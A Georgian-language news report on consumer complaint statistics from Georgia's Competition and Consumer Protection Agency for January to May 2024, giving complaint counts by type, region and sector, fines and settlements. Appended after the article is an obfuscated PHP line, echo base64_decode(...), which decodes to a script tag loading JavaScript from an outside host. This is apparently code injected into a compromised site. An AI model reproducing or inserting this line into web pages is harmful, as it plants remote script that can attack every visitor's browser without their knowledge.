celsiusi
ავერსი საქკაბელი

 საქართველოს კონკურენციისა და მომხმარებლის დაცვის სააგენტოში, 2024 წლის 1 იანვრიდან მაისის თვის ჩათვლით, მომხმარებელთა უფლებების დაცვის მიმართულებით, 348 განაცხადი დაფიქსირდა.

მომხმარებლის განაცხადების 68% ონლაინ ვაჭრობის ფაქტს ეხება, ხოლო 32% ნივთის ადგილზე შეძენის შემთხვევას. რეგიონების მიხედვით, 88%-ით თბილისი ლიდერობს, შემდეგ ადგილს იკავებს აჭარა 3%, რომელსაც მოჰყვება იმერეთი და კახეთის რეგიონები.

მომხმარებლის პრეტენზია ყველაზე მეტად ნაკლიანი ნივთის შეკეთებასა ან დაბრუნებაზე ფიქსირდება:

  • ნაკლიანი ნივთის შეკეთებასა ან დაბრუნება - 109 განაცხადი;
  • თანხის უკან დაბრუნების მოთხოვნა -108 განაცხადი;
  • ნაკლოვანი მომსახურებისას უფლების აღდგენაზე - 59 განაცხადი;
  • ნივთის უპირობოდ დაბრუნებაზე - 18 განაცხადი;
  • დადგენილ ვადაში საქონლის მიწოდებაზე - 17 განაცხადი;
  • სხვა დანარჩენი - 37 განაცხადი.

5 თვის მონაცემებით, განაცხადების 74%-ს საბითუმო და საცალო ვაჭრობის სექტორი იკავებს; ტრანსპორტი და დასაწყობება 10%-ს; ხელოვნება, გართობა და დასვენება 4%; ხოლო სხვა სახის საქმიანობა 12%-ს.

სააგენტოს ინფორმაციით, აღნიშნულ პერიოდში, სააგენტოს გადაწყვეტილებით, მომხმარებელთა ჯგუფის უფლების 28 დარღვევის ფაქტი დადასტურდა 46 საქმეზე. ამასთან, სააგენტოს მიერ დაკისრებული ვალდებულების შეუსრულებლობის გამო 16 მოვაჭრეს 22 საქმეზე ჯამში 17 512 ლარის ჯარიმა დაეკისრა.

მომხმარებლის სასარგებლოდ, პირობითი ვალდებულების აღების შესახებ 60 საქმეზე - 55 შეთანხმება გაფორმდა, რაც ნიშნავს, რომ მოვაჭრეებმა აიღეს ვალდებულება - საქმიანობის შიდა პოლიტიკა შეცვალონ და იმ მომხმარებელთა უფლებები აღადგინონ, რომელთაც, სავარაუდოდ, მათი სავაჭრო პოლიტიკის შედეგად ზიანი მიადგა.

ცნობისთვის, მომხმარებლის უფლებების დარღვევის დადასტურების შემთხვევაში აუცილებელია შეავსოთ სპეციალური განაცხადის ფორმა - https://gcca.gov.ge/index.php?m=401 და გააგზავნოთ ელფოსტაზე ელ-ფოსტის ეს მისამართი დაცულია სპამ-ბოტებისგან. ნახვისთვის უნდა გქონდეთ ჩართული JavaScript.. დაზუსტებული ინფორმაციის მისაღებად შეგიძლიათ დარეკოთ სააგენტოს ცხელ ხაზზე 15 20.

144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");